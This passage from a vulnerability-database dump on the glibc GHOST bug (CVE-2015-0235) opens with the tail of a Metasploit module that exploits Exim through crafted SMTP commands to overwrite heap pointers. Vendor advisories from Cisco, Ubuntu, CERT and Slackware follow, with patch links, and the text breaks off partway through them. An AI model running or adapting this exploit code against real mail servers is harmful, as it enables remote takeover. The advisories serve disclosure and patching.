PREV_INUSE\n\n # auth_xtextdecode() is the only way to overwrite the beginning of a\n # current_block of memory (the \"storeblock\" structure) with arbitrary data\n # (so that our hijacked \"next\" pointer can contain NUL, CR, LF characters).\n # this shapes the rest of our exploit: we overwrite the beginning of the\n # current_block of POOL_PERM memory with the current_block of POOL_MAIN\n # memory (allocated by auth_xtextdecode()).\n\n auth_prefix = rand_text_alpha(x86 ? 11264 : 11280)\n (x86 ? 4 : 8).times { |i| auth_prefix += sprintf(\"+%02x\", (where >> (i*8)) & 255) }\n auth_prefix += \".\"\n\n # also fill log_buffer with alpha chars\n smtp_send(\"MAIL FROM:<> AUTH=\", auth_prefix, method(:rand_text_alpha), \"+\", \"\", 0x3030)\n smtp_recv(501, 'invalid data for AUTH')\n\n smtp_send(\"HELO \", \"[1:2:3:4:5:6:7:8%eth0:\", \" \", \"#{what}]\", \"\", len)\n begin\n reply = smtp_recv(ANY_CODE)\n return reply if reply[:code] !~ /#{HELO_CODES}/\n return reply if reply[:code] != \"250\" and reply[:lines].first !~ /argument does not match calling host/\n\n smtp_send(\"MAIL FROM:<>\")\n reply = smtp_recv(ANY_CODE)\n return reply if reply[:code] != \"250\"\n\n smtp_send(\"RCPT TO:<postmaster>\")\n reply = smtp_recv\n return reply\n\n rescue\n return nil\n end\n\n ensure\n smtp_disconnect\n end\n\n DIGITS = '([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])'\n DOT = '[.]'\n\n def smtp_connect(exploiting = true)\n fail_with(Failure::Unknown, \"sock isn't nil\") if sock\n\n connect\n fail_with(Failure::Unknown, \"sock is nil\") if not sock\n @smtp_state = :recv\n\n # Receiving the banner (but we don't really need to check it)\n smtp_recv(220)\n return if not exploiting\n\n sender_host_address = datastore['SENDER_HOST_ADDRESS']\n if sender_host_address !~ /\\A#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}\\z/\n fail_with(Failure::BadConfig, \"bad SENDER_HOST_ADDRESS (nil)\") if sender_host_address.nil?\n fail_with(Failure::BadConfig, \"bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)\")\n end\n sender_host_address_octal = \"0\" + $1.to_i.to_s(8) + \".#{$2}.#{$3}.#{$4}\"\n\n # turn helo_seen on (enable the MAIL command)\n # call smtp_verify_helo() (force fopen() and small malloc()s)\n # call host_find_byname() (force gethostbyname's initial 1024-byte malloc())\n smtp_send(\"HELO #{sender_host_address_octal}\")\n reply = smtp_recv(HELO_CODES)\n\n if reply[:code] != \"250\"\n fail_with(Failure::NoTarget, \"not Exim?\") if reply[:lines].first !~ /argument does not match calling host/\n fail_with(Failure::BadConfig, \"bad SENDER_HOST_ADDRESS (helo_verify_hosts)\")\n end\n\n if reply[:lines].first =~ /\\A250 (\\S*) Hello (.*) \\[(\\S*)\\]\\r\\n\\z/mn\n fail_with(Failure::BadConfig, \"bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)\") if sender_host_address != $3\n smtp_active_hostname = $1\n sender_host_name = $2\n\n if sender_host_name =~ /\\A(.*) at (\\S*)\\z/mn\n sender_host_name = $2\n sender_ident = $1\n else\n sender_ident = nil\n end\n fail_with(Failure::BadConfig, \"bad SENDER_HOST_ADDRESS (no FCrDNS)\") if sender_host_name == sender_host_address_octal\n\n else\n # can't double-check sender_host_address here, so only for advanced users\n fail_with(Failure::BadConfig, \"user-supplied EHLO greeting\") unless datastore['FORCE_EXPLOIT']\n # worst-case scenario\n smtp_active_hostname = \"A\" * NS_MAXDNAME\n sender_host_name = \"A\" * NS_MAXDNAME\n sender_ident = \"A\" * 127 * 4 # sender_ident = string_printing(string_copyn(p, 127));\n end\n\n _sender = @sender\n @sender = {\n hostaddr: sender_host_address,\n hostaddr8: sender_host_address_octal,\n hostname: sender_host_name,\n ident: sender_ident,\n __smtp_active_hostname: smtp_active_hostname\n }\n fail_with(Failure::BadConfig, \"sender changed\") if _sender and _sender != @sender\n\n # avoid a future pathological case by forcing it now:\n # \"Do NOT free the first successor, if our current block has less than 256 bytes left.\"\n smtp_send(\"MAIL FROM:\", \"<\", method(:rand_text_alpha), \">\", \"\", STOREPOOL_MIN_SIZE + 16)\n smtp_recv(501, 'sender address must contain a domain')\n\n smtp_send(\"RSET\")\n smtp_recv(250, 'Reset OK')\n end\n\n def smtp_send(prefix, arg_prefix = nil, arg_pattern = nil, arg_suffix = nil, suffix = nil, arg_length = nil)\n fail_with(Failure::BadConfig, \"state is #{@smtp_state}\") if @smtp_state != :send\n @smtp_state = :sending\n\n if not arg_pattern\n fail_with(Failure::BadConfig, \"prefix is nil\") if not prefix\n fail_with(Failure::BadConfig, \"param isn't nil\") if arg_prefix or arg_suffix or suffix or arg_length\n command = prefix\n\n else\n fail_with(Failure::BadConfig, \"param is nil\") unless prefix and arg_prefix and arg_suffix and suffix and arg_length\n length = arg_length - arg_prefix.length - arg_suffix.length\n fail_with(Failure::BadConfig, \"smtp_send\", \"len is #{length}\") if length <= 0\n argument = arg_prefix\n case arg_pattern\n when String\n argument += arg_pattern * (length / arg_pattern.length)\n argument += arg_pattern[0, length % arg_pattern.length]\n when Method\n argument += arg_pattern.call(length)\n end\n argument += arg_suffix\n fail_with(Failure::BadConfig, \"arglen is #{argument.length}, not #{arg_length}\") if argument.length != arg_length\n command = prefix + argument + suffix\n end\n\n fail_with(Failure::BadConfig, \"invalid char in cmd\") if command.count(\"^\\x20-\\x7F\") > 0\n fail_with(Failure::BadConfig, \"cmdlen is #{command.length}\") if command.length > SMTP_CMD_BUFFER_SIZE\n command += \"\\n\" # RFC says CRLF, but squeeze as many chars as possible in smtp_cmd_buffer\n\n # the following loop works around a bug in the put() method:\n # \"while (send_idx < send_len)\" should be \"while (send_idx < buf.length)\"\n # (or send_idx and/or send_len could be removed altogether, like here)\n\n while command and not command.empty?\n num_sent = sock.put(command)\n fail_with(Failure::BadConfig, \"sent is #{num_sent}\") if num_sent <= 0\n fail_with(Failure::BadConfig, \"sent is #{num_sent}, greater than #{command.length}\") if num_sent > command.length\n command = command[num_sent..-1]\n end\n\n @smtp_state = :recv\n end\n\n def smtp_recv(expected_code = nil, expected_data = nil)\n fail_with(Failure::BadConfig, \"state is #{@smtp_state}\") if @smtp_state != :recv\n @smtp_state = :recving\n\n failure = catch(:failure) do\n\n # parse SMTP replies very carefully (the information\n # leak injects arbitrary data into multiline replies)\n\n data = \"\"\n while data !~ /(\\A|\\r\\n)[0-9]{3}[ ].*\\r\\n\\z/mn\n begin\n more_data = sock.get_once\n rescue\n throw(:failure, \"Caught #{$!.class}: #{$!.message}\")\n end\n throw(:failure, \"no more data\") if more_data.nil?\n throw(:failure, \"no more data\") if more_data.empty?\n data += more_data\n end\n\n throw(:failure, \"malformed reply (count)\") if data.count(\"\\0\") > 0\n lines = data.scan(/(?:\\A|\\r\\n)[0-9]{3}[ -].*?(?=\\r\\n(?=[0-9]{3}[ -]|\\z))/mn)\n throw(:failure, \"malformed reply (empty)\") if lines.empty?\n\n code = nil\n lines.size.times do |i|\n lines[i].sub!(/\\A\\r\\n/mn, \"\")\n lines[i] += \"\\r\\n\"\n\n if i == 0\n code = lines[i][0,3]\n throw(:failure, \"bad code\") if code !~ /\\A[0-9]{3}\\z/mn\n if expected_code and code !~ /\\A(#{expected_code})\\z/mn\n throw(:failure, \"unexpected #{code}, expected #{expected_code}\")\n end\n end\n\n line_begins_with = lines[i][0,4]\n line_should_begin_with = code + (i == lines.size-1 ? \" \" : \"-\")\n\n if line_begins_with != line_should_begin_with\n throw(:failure, \"line begins with #{line_begins_with}, \" \\\n \"should begin with #{line_should_begin_with}\")\n end\n end\n\n throw(:failure, \"malformed reply (join)\") if lines.join(\"\") != data\n if expected_data and data !~ /#{expected_data}/mn\n throw(:failure, \"unexpected data\")\n end\n\n reply = { code: code, lines: lines }\n @smtp_state = :send\n return reply\n end\n\n fail_with(Failure::UnexpectedReply, \"#{failure}\") if expected_code\n return nil\n end\n\n def smtp_disconnect\n disconnect if sock\n fail_with(Failure::Unknown, \"sock isn't nil\") if sock\n @smtp_state = :disconnected\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/smtp/exim_gethostbyname_bof.rb"}], "cisco": [{"lastseen": "2019-05-29T15:32:44", "bulletinFamily": "software", "description": "A vulnerability in the function of GNU glibc could allow an unauthenticated, remote attacker to execute arbitrary code, cause a denial of service condition, or access sensitive information.\n\nThe vulnerability is due to improper input validation. An unauthenticated, remote attacker could exploit this vulnerability by sending malicious requests to a targeted system.\n\nOn January 27, 2015, a buffer overflow vulnerability in the GNU C library (glibc) was publicly announced. This vulnerability is related to the various gethostbyname functions included in glibc and affects applications that call these functions. This vulnerability may allow an attacker to obtain sensitive information from an exploited system or, in some instances, perform remote code execution with the privileges of the application being exploited.\n\nThe glibc library is a commonly used third-party software component that is released by the GNU software project and a number of Cisco products are likely affected.\n\nThis advisory will be updated as additional information becomes available. Cisco will release free software updates that address this vulnerability. Workarounds that mitigate this vulnerability are not available.\n\nThis advisory is available at the following link:\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost [\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\"]", "modified": "2015-07-24T17:47:13", "published": "2015-01-28T22:30:00", "id": "CISCO-SA-20150128-GHOST", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost", "type": "cisco", "title": "GNU glibc gethostbyname Function Buffer Overflow Vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2019-02-01T18:02:36", "bulletinFamily": "software", "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "modified": "2015-03-13T00:00:00", "published": "2015-02-26T00:00:00", "id": "HUAWEI-SA-20150226-01-GLIBC", "href": "https://www.huawei.com/en/psirt/security-advisories/2015/hw-415364", "title": "Security Advisory - Glibc Buffer Overflow Vulnerability", "type": "huawei", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2019-05-29T17:23:29", "bulletinFamily": "unix", "description": "It was discovered that a buffer overflow existed in the gethostbyname and gethostbyname2 functions in the GNU C Library. An attacker could use this issue to execute arbitrary code or cause an application crash, resulting in a denial of service.", "modified": "2015-01-27T00:00:00", "published": "2015-01-27T00:00:00", "id": "USN-2485-1", "href": "https://usn.ubuntu.com/2485-1/", "title": "GNU C Library vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2019-10-09T19:49:06", "bulletinFamily": "info", "description": "### Overview \n\nThe `__nss_hostname_digits_dots()` function of the GNU C Library (glibc) allows a buffer overflow condition in which arbitrary code may be executed. This vulnerability has been assigned CVE-2015-0235, and is referred to in the media by the name \"GHOST\".\n\n### Description \n\nAccording to Qualys, the vulnerability is \"a buffer overflow in the `__nss_hostname_digits_dots()` function of the GNU C Library (`glibc`). This bug is reachable both locally and remotely via the `gethostbyname*()` functions\" and furthermore, \"arbitrary code execution can be achieved\" by use of the buffer overflow.\n\nAll versions of `glibc` from `glibc-2.2` (released 2010-11-10) until `glibc-2.17` are vulnerable. The vulnerability was patched on 2013-05-21, prior to the release of `glibc-2.18`. \n \nFor more details, please see the full [Qualys Security Advisory](<https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt>). \n \n--- \n \n### Impact \n\nThe `__nss_hostname_digits_dots()` function allows a buffer overflow condition in which arbitrary code may be executed. The impact may vary depending on if the use case is local or remote. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nAffected users may apply a patch or update to `glibc-2.18`` `or later. The Vendor Status information below provides more information on updates. \n \n--- \n \n### Vendor Information\n\nSome older, no longer supported versions of linux distributions may contain an older version of glibc that is vulnerable. Please check with your vendor to find out if you need to upgrade to a newer operating system in order to address this issue. \n \n--- \n \n967332\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Arch Linux\n\nNotified: January 28, 2015 Updated: January 30, 2015 \n\n**Statement Date: January 28, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"`Arch Linux is not vulnerable. [Arch Linux is] on a modern version of glibc so [Arch Linux] should have been safe for 18+ months.`\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\nIf using an edition of Arch Linux older than about 18 months, you may wish to check with the vendor to find out if you need to upgrade.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23967332 Feedback>).\n\n### __ Blue Coat Systems\n\nUpdated: January 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://bto.bluecoat.com/security-advisory/sa90>\n\n### __ Cisco Systems, Inc.\n\nUpdated: January 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost>\n\n### __ Citrix\n\nUpdated: January 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.citrix.com/article/CTX200391>\n\n### __ Debian GNU/Linux\n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n**Statement Date: January 28, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://security-tracker.debian.org/tracker/CVE-2015-0235>\n\n### __ F5 Networks, Inc.\n\nUpdated: January 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://support.f5.com/kb/en-us/solutions/public/16000/000/sol16057.html>\n\n### __ __ Gentoo Linux\n\nNotified: January 28, 2015 Updated: January 30, 2015 \n\n**Statement Date: January 29, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"Our most recent glibc packages are not affected; we'll be issuing an\n\nadvisory anyway to inform users who may still have older versions installed.\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Juniper Networks, Inc.\n\nUpdated: January 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10671&cat=SIRT_1&actp=](<http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10671&cat=SIRT_1&actp=>)\n\n### __ __ NEC Corporation\n\nUpdated: October 22, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"We provide information on this issue at the following URL: <<http://jpn.nec.com/security-info/secinfo/nv15-007.html>> (only in Japanese).\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://jpn.nec.com/security-info/secinfo/nv15-007.html>\n\n### __ NetApp\n\nUpdated: January 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://kb.netapp.com/support/index?page=content&id=9010027](<https://kb.netapp.com/support/index?page=content&id=9010027>)\n\n### __ __ Openwall GNU/*/Linux\n\nNotified: January 28, 2015 Updated: January 30, 2015 \n\n**Statement Date: January 29, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"`Openwall GNU/*/Linux (Owl) was affected, although there's no known \nattack vector that would expose the glibc bug as a vulnerability in an \ninstall of Owl with no third-party software. We have released glibc \nupdates for Owl 3.1-stable and Owl-current on 2015/01/28.`\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Red Hat, Inc.\n\nNotified: January 28, 2015 Updated: January 30, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://access.redhat.com/security/cve/CVE-2015-0235>\n * <https://rhn.redhat.com/errata/RHSA-2015-0099.html>\n\n### __ __ SUSE Linux\n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n**Statement Date: January 28, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"`SUSE Linux Enterprise 11 and older are affected by the problem. We released \nupdates \nfor all supported and affected codestreams. \n \nSUSE Linux Enterprise 12 is not affected by this problem.`\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.novell.com/security/cve/CVE-2015-0235.html>\n * <http://lists.suse.com/pipermail/sle-security-updates/2015-January/001186.html>\n\n### __ Slackware Linux Inc.\n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n**Statement Date: January 28, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://www.slackware.com/security/list.php?l=slackware-security&y=2015](<http://www.slackware.com/security/list.php?l=slackware-security&y=2015>)\n\n### __ __ Ubuntu\n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n**Statement Date: January 28, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"`Ubuntu 10.04 LTS (lucid) and Ubuntu 12.04 LTS (precise) were \naffected; Ubuntu 14.04 LTS and newer releases were not, as they \nincluded versions of the GNU C Library that already contained the \nupstream fix.`\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.ubuntu.com/usn/usn-2485-1/>\n * <https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/GHOST>\n\n### __ __ openSUSE project\n\nNotified: January 28, 2015 Updated: January 30, 2015 \n\n**Statement Date: January 28, 2015**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"`openSUSE 13.1 and 13.2 are not affected by the problem.`\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.novell.com/security/cve/CVE-2015-0235.html>\n * <http://lists.suse.com/pipermail/sle-security-updates/2015-January/001186.html>\n\n### Addendum\n\nOlder versions of openSUSE may be affected. Check with the vendor to see if you require an upgrade.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23967332 Feedback>).\n\n### __ __ Contiki OS\n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n**Statement Date: January 28, 2015**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\n\"`Contiki OS does not use the GNU libc resolver functions so is not affected \nby this.`\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ CentOS\n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Cray Inc.\n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Fedora Project\n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Hewlett-Packard Company\n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ IBM Corporation (zseries)\n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ IBM eServer\n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Mandriva S. A.\n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Oracle Corporation\n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Turbolinux\n\nNotified: January 28, 2015 Updated: January 28, 2015 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\nView all 26 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10.0 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 7.8 | E:POC/RL:OF/RC:C \nEnvironmental | 5.9 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt>\n * <http://www.openwall.com/lists/oss-security/2015/01/27/9>\n\n### Acknowledgements\n\nCredit to Qualys for discovering the vulnerability.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-0235](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0235>) \n---|--- \n**Date Public:** | 2015-01-28 \n**Date First Published:** | 2015-01-28 \n**Date Last Updated: ** | 2015-10-22 13:00 UTC \n**Document Revision: ** | 24 \n", "modified": "2015-10-22T13:00:00", "published": "2015-01-28T00:00:00", "id": "VU:967332", "href": "https://www.kb.cert.org/vuls/id/967332", "type": "cert", "title": "GNU C Library (glibc) __nss_hostname_digits_dots() function vulnerable to buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2019-05-30T07:37:20", "bulletinFamily": "unix", "description": "New glibc packages are available for Slackware 13.0, 13.1, 13.37, 14.0,\nand 14.1 to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/glibc-2.17-i486-10_slack14.1.txz: Rebuilt.\n This update patches a security issue __nss_hostname_digits_dots() function\n of glibc which may be triggered through the gethostbyname*() set of\n functions. This flaw could allow local or remote attackers to take control\n of a machine running a vulnerable version of glibc. Thanks to Qualys for\n discovering this issue (also known as the GHOST vulnerability.)\n For more information, see:\n https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235\n (* Security fix *)\npatches/packages/glibc-i18n-2.17-i486-10_slack14.1.txz: Rebuilt.\npatches/packages/glibc-profile-2.17-i486-10_slack14.1.txz: Rebuilt.\npatches/packages/glibc-solibs-2.17-i486-10_slack14.1.txz: Rebuilt.\npatches/packages/glibc-zoneinfo-2014j-noarch-1.txz: Upgraded.\n Upgraded to tzcode2014j and tzdata2014j.\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/glibc-2.9-i486-7_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/glibc-i18n-2.9-i486-7_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/glibc-profile-2.9-i486-7_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/glibc-solibs-2.9-i486-7_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/glibc-zoneinfo-2014j-noarch-1.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/glibc-2.9-x86_64-7_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/glibc-i18n-2.9-x86_64-7_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/glibc-profile-2.9-x86_64-7_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/glibc-solibs-2.9-x86_64-7_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/glibc-zoneinfo-2014j-noarch-1.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-2.11.1-i486-9_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-i18n-2.11.1-i486-9_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-profile-2.11.1-i486-9_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-solibs-2.11.1-i486-9_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/glibc-zoneinfo-2014j-noarch-1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-2.11.1-x86_64-9_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-i18n-2.11.1-x86_64-9_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-profile-2.11.1-x86_64-9_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-solibs-2.11.1-x86_64-9_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/glibc-zoneinfo-2014j-noarch-1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-2.13-i486-8_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-i18n-2.13-i486-8_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-profile-2.13-i486-8_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-solibs-2.13-i486-8_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/glibc-zoneinfo-2014j-noarch-1.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-2.13-x86_64-8_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-i18n-2.13-x86_64-8_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-profile-2.13-x86_64-8_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-solibs-2.13-x86_64-8_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/glibc-zoneinfo-2014j-noarch-1.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/glibc-2.15-i486-9_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/glibc-i18n-2.15-i486-9_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/glibc-profile-2.15-i486-9_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/glibc-solibs-2.15-i486-9_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/glibc-zoneinfo-2014j-noarch-1.txz\n\nUpdated packages for Slackware x86_64 